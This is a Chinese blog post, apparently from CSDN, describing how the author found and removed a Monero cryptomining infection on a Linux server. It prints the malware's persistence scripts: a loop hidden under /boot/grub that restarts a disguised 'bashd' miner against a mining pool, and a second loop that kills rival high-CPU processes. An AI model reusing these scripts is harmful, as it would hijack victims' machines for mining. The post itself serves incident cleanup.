1.查看进程
# ps -e -o 'pid,comm,args,pcpu,rsz,vsz,stime,user,uid'
找出CPU占有率高的你不认识的进程,我的是这样的
bashd -a cryptonight -o stratum+tcp://pool.minexmr.com:5555 -u 4AUF3pa
干掉它
kill -9 11110
2.全局搜索这个进程
[root@wangtianze ~]# grep -r pool.minexmr.com
.bash_history:grep -r pool.minexmr.com
.bash_history:cat daemon | grep pool.minexmr.com
.bash_history:cat deamon | grep pool.minexmr.com
.bash_history:grep -r pool.minexmr.com
.bash_history:grep -r pool.minexmr.com
.bash_history:ps -e -o 'pid,comm,args,pcpu,rsz,vsz,stime,user,uid' | pool.minexmr.com
.bash_history:grep -r pool.minexmr.com
3.打开搜索到的位置
# vim /boot/grub/deamon
里面是这样的
#!/bin/bash
#daemon
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
while true;
do
server=`ps aux | grep 'pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj' | grep -v grep`
if [ ! "$server" ]; then
cp -rf /boot/grub/grub.tz /usr/sbin/bashd
chmod +x /usr/sbin/bashd
cd /usr/sbin
nohup bashd -a cryptonight -o stratum+tcp://pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj -p x &
fi
sleep 15
done
删掉里面的while循环,只保留
#!/bin/bash
#daemon
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
全局搜索
# grep -r pool.minexmr.com
同样干掉
#!/bin/bash
#disk_genius
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
while true;
do
ps aux --sort=%cpu |grep -v 'pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj' | awk '{if($3 > 40.0 && $NF ~//) print $2}' |xargs -i kill -9 {}
sleep 3
done
改成
#!/bin/bash
#disk_geniusi
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
再次搜索
# grep -r pool.minexmr.com
终于没了
首先找到是哪里的漏洞,设置特定IP访问
---------------------
作者:Wang_Tian_Ze
来源:CSDN
原文:https://blog.csdn.net/qq_16845639/article/details/77650271
版权声明:本文为博主原创文章,转载请附上博文链接!